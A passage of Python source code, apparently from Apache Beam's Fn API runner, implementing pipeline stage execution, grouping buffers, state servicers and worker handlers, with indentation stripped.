req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError('All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None,
progress_request_frequency=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id='unknown-job-id',
job_name='unknown-job-name',
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if not 'beam_fn_api' in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
_LOGGER.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable, cache_token_generator):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator
)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
# TODO(SDF): This requires determanistic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment, and
returns a ``WorkerHandler`` class.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker_handlers share the same grpc server, so we can read grpc server
# info from any worker_handler and read from the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
_LOGGER.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list, process_bundle_descriptor, data_input, data_output,
get_input_coder_impl, cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
transform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
:arg static If True, generator always returns the same cache token
If False, generator returns a new cache token each time
:return A generator which returns a cache token on next(generator)
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2
.ProcessBundleRequest.CacheToken.UserState(),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}), state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
